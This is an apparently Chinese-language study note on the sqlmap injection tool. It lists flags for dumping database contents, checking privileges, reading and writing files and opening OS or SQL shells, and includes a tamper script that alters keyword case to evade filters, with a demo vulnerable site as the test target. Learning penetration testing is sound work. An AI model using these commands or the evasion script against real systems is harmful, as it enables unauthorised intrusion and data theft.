当前位置: 首页 > article >正文

注入工具SQLMAPTamper 编写指纹修改高权限操作目录架构

# 参考:
https://www.cnblogs.com/bmjoker/p/9326258.html
# 数据猜解 - 库表列数据 & 字典
测试: http://vulnweb.com/
--current-db
--tables -D ""
--columns -T "" -D ""
--dump -C "" -C "" -T ""
# 权限操作 - 文件 & 命令 & 交互式
测试: MYSQL 高权限注入
引出权限:
--is-dba --privileges
引出文件:
--file-read --file-write --file-dest
引出命令:
--os-cmd= --os-shell --sql-shell
# 提交方法 -POST&HEAD&JSON
测试: Post Cookie Json
--data ""
--cookie ""
-r 1.txt
如果是json模式的话 就把数据包放在文件 然后对这文件进行注入
# 绕过模块 -Tamper 脚本 - 使用 & 开发
测试: base64 注入 有过滤的注入
--tamper=base64encode.py
--tamper=test.py
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass(遇到过滤 发现如何绕过 然后·写脚本 再用sqlmap)
def tamper(payload, **kwargs):
if payload:
payload = payload.replace('SELECT','sElEct')
payload = payload.replace('OR','Or')
payload = payload.replace('AND','And')
payload = payload.replace('SLEEP','SleeP')....

http://www.kler.cn/a/614236.html

相关文章:

  • 资产收益数据处理与分析
  • 蓝桥刷题note11(好数)
  • 嵌入式开发技术总结报告
  • 向量数据库学习笔记(2) —— pgvector 用法 与 最佳实践
  • YOLO基础知识
  • 金融市场中的时间序列预测:思考与方法
  • 【商城实战(102)】破局与进阶:商城系统的未来进化之路
  • hbuilderx打包iOS上传苹果商店的最简流程
  • 【Linux系统】—— 进程状态
  • LLaMA-Factory微调实操记录
  • 12款星光闪光污迹艺术绘画效果Clip Studio Paint笔刷画笔+闪光纹理图片 Clip Studio Glitter Texture Brushes
  • Linux中安装宝塔面板
  • 雨云云应用测评!内测持续进行中!
  • 全新版租赁商城小程序源码系统 源码开源支持二开+图文搭建教程
  • 人工智能之数学基础:实对称矩阵
  • Java项目实现幂等性方案总结
  • MOSN(Modular Open Smart Network)-03-流量劫持
  • LLMs Multi-agent 概述
  • SQL Server数据库引擎服务启动失败:端口冲突
  • 【Spring Boot 与 Spring Cloud 深度 Mape 之一】剖析 Spring Boot 核心:从快速构建到自动配置原理与实战